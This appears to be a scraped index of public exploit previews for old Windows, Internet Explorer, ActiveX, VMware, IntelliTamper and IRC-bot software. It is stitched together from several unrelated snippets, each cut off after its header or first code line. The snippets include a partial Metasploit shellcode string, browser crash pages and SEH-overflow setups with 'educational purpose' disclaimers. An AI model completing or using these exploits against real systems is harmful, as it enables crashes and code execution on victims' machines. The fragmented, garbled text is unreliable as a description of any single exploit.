################################################################################################################################ #MS Windows .CHM Denial of Service (html compiled) # ###################################################################
#!/usr/bin/perl intro(); #does not need a thread method shellcode to run as best as can. seh work great too! # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = xebx03x59xebx05xe8xf8xffxff
#!/usr/bin/python# This was written for educational purpose only. Use it at your own risk.# Author will be not responsible for any damage!# !!! Special greetz for my friend sinner_01 !!!# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
######################################################################################## #svchost.exe CPU usage boils up to almost 100 percent when we open the malicious #webpage and IE7 (Version 7.0.5730.13) closes with all tabs. # #Tested On: # Mic
!-- IE Denial of Service Exploit ( mshtml.dll ) . . Tested on IE6. !-- simply click on the file saved as /crash.html/ And after few seconds crashes ... -- !-- /Be safe. /cnaph. -- !-- Greetz to : Str0ke , Blub, etc . . . -- scriptfunction Req(u){var
html !-- Bug discovered by cN4phux a small GHH from DZ. # VMware COM DB ActiveX Remote Buffer Overflow Exploit # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # Tested on Window
!-- // Virgilio Toolbar Toolbar ActiveX Control Remote Denial of Service Exploit // Version == 1.3.0.0 // Internet Explorer ver 6.0 , 7.0 // Tested on Windows SP2 Bug discovered by cN4phux. Greet'z ^to : Blub , Knuthy , Djug , Xacker , DATA_SNIPER ,
#!usr/bin/python # IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit. # we start off the exploitation with some fuzzing to determine how many bytes # before overwriting the pointer to next SEH # and pointer to SEH, we will try and overw
; bs_fantasy_ext = 1.1.16 Exploit by Phil ; Kudos to MattT for pointing this out ; Only seems to work for non-vhosted unresolved IPs ; Code is a little inefficient, sorry. ; Usage: /getip channel nickname bs bot nickname alias getip { if ($1 != $null